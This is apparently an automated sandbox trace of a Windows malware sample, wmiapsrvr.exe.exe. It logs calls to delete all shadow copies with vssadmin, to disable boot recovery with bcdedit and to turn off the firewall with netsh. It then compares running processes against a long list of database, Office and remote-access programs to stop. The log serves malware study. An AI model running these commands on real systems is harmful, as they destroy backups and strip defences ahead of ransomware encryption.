# Flog Txt Version 1 # Analyzer Version: 3.2.2 # Analyzer Build Date: Mar 3 2020 14:14:30 # Log Creation Date: 11.03.2020 17:18:03.951 Process: id = "1" image_name = "wmiapsrvr.exe.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wmiapsrvr.exe.exe" page_root = "0x4797f000" os_pid = "0x618" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x454" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WMIAPSRVR.EXE.exe\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 1 os_tid = 0x894 [0071.089] GetUserDefaultLangID () returned 0x409 [0071.299] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x39f09c | out: TokenHandle=0x39f09c*=0x84) returned 1 [0071.299] GetTokenInformation (in: TokenHandle=0x84, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x39f0a0 | out: TokenInformation=0x0, ReturnLength=0x39f0a0) returned 0 [0071.300] GetLastError () returned 0x7a [0071.300] GetProcessHeap () returned 0x780000 [0071.300] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x54) returned 0x794c40 [0071.300] GetTokenInformation (in: TokenHandle=0x84, TokenInformationClass=0x19, TokenInformation=0x794c40, TokenInformationLength=0x14, ReturnLength=0x39f0a0 | out: TokenInformation=0x794c40, ReturnLength=0x39f0a0) returned 1 [0071.300] GetSidSubAuthorityCount (pSid=0x794c48*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, 
[2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000)) returned 0x794c49 [0071.300] GetSidSubAuthority (pSid=0x794c48*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000), nSubAuthority=0x0) returned 0x794c50 [0071.300] GetProcessHeap () returned 0x780000 [0071.300] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x794c40 | out: hHeap=0x780000) returned 1 [0071.301] CloseHandle (hObject=0x84) returned 1 [0071.301] lstrcpyW (in: lpString1=0x39ee48, lpString2=" delete shadows /all /quiet" | out: lpString1=" delete shadows /all /quiet") returned=" delete shadows /all /quiet" [0071.301] CreateProcessW (in: lpApplicationName="C:\\Windows\\sysnative\\vssadmin.exe", lpCommandLine=" delete shadows /all /quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x39f050*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x39f094 | out: lpCommandLine=" delete shadows /all /quiet", lpProcessInformation=0x39f094*(hProcess=0x88, hThread=0x84, dwProcessId=0x830, dwThreadId=0x324)) returned 1 [0071.385] CloseHandle (hObject=0x84) returned 1 [0071.386] CloseHandle (hObject=0x88) returned 1 [0071.386] GetWindowsDirectoryW (in: lpBuffer=0x39ee1c, uSize=0x104 | out: lpBuffer="C:\\Windows") returned 0xa [0071.386] lstrcatW (in: lpString1="C:\\Windows", lpString2="\\sysnative\\cmd.exe" | out: lpString1="C:\\Windows\\sysnative\\cmd.exe") returned="C:\\Windows\\sysnative\\cmd.exe" [0071.386] ShellExecuteW (hwnd=0x0, lpOperation=0x0, lpFile="C:\\Windows\\sysnative\\cmd.exe", lpParameters="/c bcdedit /set {current} bootstatuspolicy ignoreallfailures", 
lpDirectory=0x0, nShowCmd=0) returned 0x2a [0112.145] GetWindowsDirectoryW (in: lpBuffer=0x39ee1c, uSize=0x104 | out: lpBuffer="C:\\Windows") returned 0xa [0112.145] lstrcatW (in: lpString1="C:\\Windows", lpString2="\\sysnative\\cmd.exe" | out: lpString1="C:\\Windows\\sysnative\\cmd.exe") returned="C:\\Windows\\sysnative\\cmd.exe" [0112.145] ShellExecuteW (hwnd=0x0, lpOperation=0x0, lpFile="C:\\Windows\\sysnative\\cmd.exe", lpParameters="/c bcdedit /set {current} recoveryenabled no", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0112.408] GetWindowsDirectoryW (in: lpBuffer=0x39ee1c, uSize=0x104 | out: lpBuffer="C:\\Windows") returned 0xa [0112.408] lstrcatW (in: lpString1="C:\\Windows", lpString2="\\sysnative\\cmd.exe" | out: lpString1="C:\\Windows\\sysnative\\cmd.exe") returned="C:\\Windows\\sysnative\\cmd.exe" [0112.408] ShellExecuteW (hwnd=0x0, lpOperation=0x0, lpFile="C:\\Windows\\sysnative\\cmd.exe", lpParameters="/c netsh advfirewall set allprofiles state off", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0112.722] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x210 [0112.729] Process32FirstW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0112.730] lstrcmpiW (lpString1="[System Process]", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, 
visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned -1 [0112.730] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0112.732] lstrcmpiW (lpString1="System", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, 
schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned 1 [0112.732] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0112.732] lstrcmpiW (lpString1="smss.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned 1 [0112.732] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, 
th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0112.733] lstrcmpiW (lpString1="csrss.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned -1 [0112.733] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0112.734] lstrcmpiW (lpString1="wininit.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, 
firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned 1 [0112.735] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0112.735] lstrcmpiW (lpString1="csrss.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, 
Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned -1 [0112.736] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0112.737] lstrcmpiW (lpString1="winlogon.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, 
Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned 1 [0112.737] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0112.738] lstrcmpiW (lpString1="services.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned 1 [0112.738] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 
[0112.739] lstrcmpiW (lpString1="lsass.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned -1 [0112.740] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0112.740] lstrcmpiW (lpString1="lsm.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, 
sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned -1 [0112.741] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.742] lstrcmpiW (lpString1="svchost.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, 
Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned 1 [0112.742] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.743] lstrcmpiW (lpString1="svchost.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned 1 
